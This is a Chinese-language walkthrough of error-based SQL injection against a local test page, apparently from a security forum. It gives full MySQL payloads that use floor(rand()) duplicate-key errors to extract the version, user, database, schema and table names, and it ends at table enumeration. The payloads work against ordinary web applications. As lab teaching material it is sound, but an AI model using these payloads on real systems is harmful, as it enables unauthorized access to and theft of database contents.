简介：所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

Target：http://192.168.8.142:8080/test/sqlinsert?id=2

1、判断目标站点是否存在sql注入漏洞（判断方法加入永真条件永假条件）

目标站点正常请求的返回界面

http://192.168.8.142:8080/test/sqlinsert?id=2

加入永真条件请求结果

加入永假条件请求结果

2、利用漏洞获取数据

2.1 手工注入（显错）

数据库版本

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

版本：~5.5.53~1

连接用户

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

连接用户：root@localhost

连接数据库

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

连接数据库：test

爆库

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆其他数据库

 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

修改FROM information_schema.schemata LIMIT 1,1中limit的第一数字递加

表：

Test   0x74657374

performance_schema：0x706572666f726d616e63655f736368656d61

Mysql：0x6d7973716c

Job:0x6a6f62

Blog:0x626c6f67

information_schema:0x696e666f726d6174696f6e5f736368656d61

爆当前数据表

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！